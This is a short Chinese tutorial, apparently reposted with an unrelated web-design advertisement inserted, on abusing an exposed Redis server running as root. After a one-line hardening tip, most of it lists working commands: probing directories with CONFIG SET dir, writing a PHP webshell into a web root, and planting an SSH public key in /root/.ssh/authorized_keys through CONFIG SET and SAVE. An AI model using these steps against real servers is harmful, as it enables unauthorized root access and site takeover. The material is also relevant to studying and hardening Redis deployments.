在許多服務(wù)器上部署的redis是采用Root權(quán)限進(jìn)行啟動(dòng)進(jìn)而可以利用這個(gè)Root做許多超級權(quán)限的事情。由于REDIS是沒有嚴(yán)格授權(quán)管理機(jī)制大家在部署一定不要設(shè)置為0.0.0.0以及最好使用requirepass(雖然是明文但是至少增加一定的難度)。

成都創(chuàng)新互聯(lián)公司是一家專業(yè)提供五寨企業(yè)網(wǎng)站建設(shè),專注與成都網(wǎng)站制作、網(wǎng)站建設(shè)、H5場景定制、小程序制作等業(yè)務(wù)。10年已為五寨眾多企業(yè)、政府機(jī)構(gòu)等服務(wù)。創(chuàng)新互聯(lián)專業(yè)網(wǎng)站設(shè)計(jì)公司優(yōu)惠進(jìn)行中。

本文主要利用的是redis提供的configsave兩個(gè)命令來完成我們的HACK功能便捷的工具用歪了就成了禍害。

簡單介紹幾個(gè)有用的命令

config set dir $path:

這個(gè)命令是配置為了指定redis的“工作路徑”之后生成的RDB和AOF文件都會(huì)存儲(chǔ)在這里

dbfilename $name:

RDB文件名默認(rèn)為“dump.rdb”

save:

將內(nèi)存里的數(shù)據(jù)進(jìn)行持久化操作

它們結(jié)合在一起就可以實(shí)現(xiàn)如下好玩的功能

1.指定文件夾是否存在

config set dir /home/bob

如果是返回(error) ERR Changing directory: No such file or directory表示沒有該文件夾。

如果返回OK表示服務(wù)器上有這個(gè)文件夾并且已經(jīng)將其設(shè)置為內(nèi)存快照保存的文件夾

2.webshell最好使用之前進(jìn)行flushdb,或者flushall清空內(nèi)存里數(shù)據(jù)

1.config set dir /opt/web/www #設(shè)定網(wǎng)站的目錄
2.config set dbfilename test.php #設(shè)定將要保存的文件名
3.set "" "" #我們的webshell
4.save  #將內(nèi)存持久化到test.php

3.訪問信任

1.cat ~/.ssh/id_rsa.pub > ~/foo.txt
2.cat ~/foo.txt|redis -x set hack #將foo.txt里的內(nèi)容保存為一個(gè)KEY為hack的字符串
3.config set dir /root/.ssh/ #設(shè)定root的.ssh文件夾
4.config set dbfilename authorized_keys
5.save